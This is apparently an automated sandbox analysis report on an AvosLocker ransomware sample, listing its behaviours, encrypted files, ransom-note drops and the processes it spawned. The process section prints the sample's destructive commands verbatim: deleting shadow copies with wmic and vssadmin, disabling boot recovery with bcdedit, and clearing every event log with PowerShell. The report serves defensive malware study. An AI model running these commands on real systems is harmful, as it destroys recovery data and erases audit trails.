Malware Analysis Report

2025-01-22 20:51

Sample ID 241228-1ywrasspfy
Target sex.exe
SHA256 b4589e3b06efe598a5c57d2a93ef9101d91a7be465a7d5aecb2e68b8ed1d0ae7
Tags
avoslocker defense_evasion discovery evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b4589e3b06efe598a5c57d2a93ef9101d91a7be465a7d5aecb2e68b8ed1d0ae7

Threat Level: Known bad

The file sex.exe was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Avoslocker family

Deletes shadow copies

Renames multiple (8506) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (10381) files with added filename extension

Checks computer location settings

Executes dropped EXE

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Command and Scripting Interpreter: PowerShell

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-28 22:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-28 22:04

Reported

2024-12-28 22:06

Platform

win7-20241010-en

Max time kernel

118s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sex.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Avoslocker family

avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (10381) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1604998348.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00413_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\js\settings.js C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\F12Tools.dll.mui C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\VideoLAN\VLC\locale\oc\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE.HXS C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\es-ES\TableTextService.dll.mui C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\preloaded_data.pb C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_COL.HXT C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18224_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\FM20.CHM C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Custom.propdesc C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\Java\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Common Files\System\msadc\adcjavas.inc C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02950_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\jnwmon.dll.mui C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18202_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099149.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PROFILE\PROFILE.INF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.bmp C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ERROR.GIF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287019.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\SpiderSolitaire.exe.mui C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.exe.sig C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0291984.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00799_.WMF C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\sex.exe C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr
PID 2876 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\system32\cmd.exe
PID 2216 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2216 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2216 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2900 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2900 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2900 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2908 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2908 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2908 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2748 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2896 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2896 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2876 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4884 wrote to memory of 6596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4884 wrote to memory of 6596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4884 wrote to memory of 6596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4884 wrote to memory of 5132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4884 wrote to memory of 5132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4884 wrote to memory of 5132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\sex.exe

"C:\Users\Admin\AppData\Local\Temp\sex.exe"

C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr

"C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr" /S

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

